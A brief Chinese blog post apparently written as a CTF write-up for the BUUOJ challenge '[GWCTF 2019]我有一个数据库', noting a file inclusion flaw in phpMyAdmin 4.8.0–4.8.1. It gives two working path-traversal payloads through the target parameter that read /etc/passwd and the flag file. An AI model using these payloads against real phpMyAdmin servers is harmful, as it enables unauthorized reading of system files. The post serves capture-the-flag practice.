[GWCTF 2019]我有一个数据库

试题地址:https://buuoj.cn/challenges#[GWCTF 2019]我有一个数据库
参考链接:https://blog.csdn.net/BROTHERYY/article/details/107682948

  • phpmyadmin4.8.0-4.8.1存在文件包含漏洞
    使用网上的payload直接打
?target=db_datadict.php%253f/../../../../../../../../etc/passwd
?target=db_datadict.php%253f/../../../../../../../../flag      //修改为flag就可以了

posted @ 2021-07-08 15:56  胖三斤1  阅读(65)  评论(0编辑  收藏  举报
Live2D